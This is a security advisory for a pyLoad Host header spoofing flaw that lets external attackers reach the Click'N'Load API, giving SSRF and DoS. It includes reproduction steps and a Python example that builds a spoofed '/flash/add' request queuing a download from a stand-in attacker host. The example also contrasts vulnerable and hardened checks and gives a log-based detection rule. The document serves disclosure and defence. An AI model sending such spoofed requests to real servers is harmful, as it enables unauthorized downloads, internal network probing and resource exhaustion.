pyLoad Host Header Spoofing Vulnerability Allowing SSRF and DoS

Vulnerability

A host header spoofing vulnerability has been identified in pyLoad versions prior to 0.5.0b3.dev97. The '@local_check' decorator decides whether a request is "local" from the client-supplied 'Host' header rather than from the peer address of the connection, so an unauthenticated external attacker who sets 'Host' to a loopback value bypasses the local-only restriction. This grants access to the Click'N'Load API endpoints and lets the attacker remotely queue arbitrary downloads, which in turn leads to server-side request forgery (SSRF) and denial-of-service (DoS) conditions.

Impact

Exploitation of this vulnerability allows unauthenticated attackers to interact with the Click'N'Load API and add URLs to the download queue. The pyLoad server then makes outbound requests on the attacker's behalf to attacker-chosen URLs, including hosts on the server's internal network that the attacker cannot reach directly, which is the SSRF condition. Additionally, attackers can exhaust the server's storage or bandwidth by queuing large files, causing a DoS impact.

Reproduction

To reproduce this vulnerability, ensure that a pyLoad instance is running and reachable from outside the host, and that the Click'N'Load plugin is enabled. Then, from an external machine, send a POST request to one of the protected endpoints, such as '/flash/add', with the 'Host' header set to '127.0.0.1:9666'. Include the desired URL and package name in the request data. If the instance is vulnerable, the response indicates that the URL was added to the download queue even though the request did not originate locally, demonstrating the bypass of the intended local-only restriction.
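The following is an added example, not pyLoad's own code: it builds the spoofed '/flash/add' request described above without sending it, models the vulnerable Host-based check next to a hardened peer-address check, and runs a simple detection over constructed access-log lines. The vulnerable and hardened checks are a reconstruction of the pattern the advisory describes and are an assumption about pyLoad's implementation, not a copy of it; the form field names 'urls' and 'package', the hostnames, and the log format are also assumptions.

```python
"""Host-header spoofing against a Host-based local-only check (added example, not pyLoad code)."""
import ipaddress
import re
from urllib.parse import urlencode
from urllib.request import Request

LOOPBACK_NAMES = {"localhost", "127.0.0.1", "::1"}


def host_without_port(host_header: str) -> str:
    """Strip an optional :port from a Host value: '127.0.0.1:9666' -> '127.0.0.1', '[::1]:9666' -> '::1'."""
    host = host_header.strip()
    if host.startswith("["):                       # bracketed IPv6 literal
        return host[1:host.index("]")]
    if host.count(":") == 1:                       # host:port
        return host.rsplit(":", 1)[0]
    return host


def local_check_vulnerable(remote_addr: str, headers: dict) -> bool:
    """Vulnerable pattern (assumed reconstruction): trusts the client-controlled Host header.
    remote_addr is accepted only for signature parity and deliberately ignored."""
    return host_without_port(headers.get("Host", "")).lower() in LOOPBACK_NAMES


def local_check_hardened(remote_addr: str, headers: dict) -> bool:
    """Hardened pattern: decides on the TCP peer address, which the client cannot choose.
    Behind a reverse proxy this must be the proxy-validated client address, not a forwarded header."""
    try:
        return ipaddress.ip_address(remote_addr).is_loopback
    except ValueError:
        return False


def build_spoofed_cnl_request(target: str, download_url: str, package: str,
                              spoofed_host: str = "127.0.0.1:9666") -> Request:
    """Build (without sending) the POST the advisory describes: /flash/add with a spoofed Host header."""
    body = urlencode({"urls": download_url, "package": package}).encode()   # field names are an assumption
    req = Request(f"{target.rstrip('/')}/flash/add", data=body, method="POST")
    req.add_header("Host", spoofed_host)
    req.add_header("Content-Type", "application/x-www-form-urlencoded")
    return req


def handle_flash_add(remote_addr: str, headers: dict, check) -> int:
    """Simulated endpoint: 200 when the local check passes (URL queued), 403 otherwise."""
    return 200 if check(remote_addr, headers) else 403


# Constructed access-log lines: remote address, request line, status, Host header value.
SAMPLE_LOG = """\
203.0.113.5 "POST /flash/add HTTP/1.1" 200 host=127.0.0.1:9666
127.0.0.1 "POST /flash/add HTTP/1.1" 200 host=127.0.0.1:9666
203.0.113.5 "GET / HTTP/1.1" 200 host=pyload.example.net
198.51.100.7 "POST /flash/add HTTP/1.1" 200 host=localhost:9666
"""
LOG_RE = re.compile(r'^(\S+) "(\S+) (\S+) [^"]*" \d+ host=(\S+)$')


def find_host_spoofing(log_text: str) -> list:
    """Return (remote_addr, path) for requests that claim a loopback Host from a non-loopback peer."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        remote, _method, path, host = m.groups()
        if local_check_vulnerable(remote, {"Host": host}) and not local_check_hardened(remote, {}):
            hits.append((remote, path))
    return hits


if __name__ == "__main__":
    req = build_spoofed_cnl_request("http://pyload.example.net:8000",
                                    "http://attacker.example/big.bin", "spoofed")
    print(req.full_url, req.get_header("Host"), req.data)
    attacker = ("203.0.113.5", {"Host": "127.0.0.1:9666"})
    print("vulnerable check:", handle_flash_add(*attacker, local_check_vulnerable))
    print("hardened check:  ", handle_flash_add(*attacker, local_check_hardened))
    print("suspicious log entries:", find_host_spoofing(SAMPLE_LOG))
```

The detection rule is the same mismatch the fix relies on: a request whose Host header names loopback but whose peer address does not is either a spoof attempt or a misconfigured proxy, and both deserve a look. When pyLoad sits behind a reverse proxy, compare against the address the proxy itself reports for the client, not against anything the client can inject.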

Remediation

Users should update to pyLoad version 0.5.0b3.dev97 or later, where this vulnerability has been patched. Until the update is applied, the reproduction steps above show the precondition to remove: do not expose the pyLoad instance, and in particular the Click'N'Load port, beyond the local host or a trusted network.

Added: Mar 24, 2026, 8:41 PM
Updated: Mar 24, 2026, 8:41 PM

Vulnerability Rating

Custom Algorithm
spread: 2.4
impact: 2.5
exploitability: 5.6
remediation: 7.7
relevance: 4.6
threat: 6.4
urgency: 2.9
incentive: 0.0

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.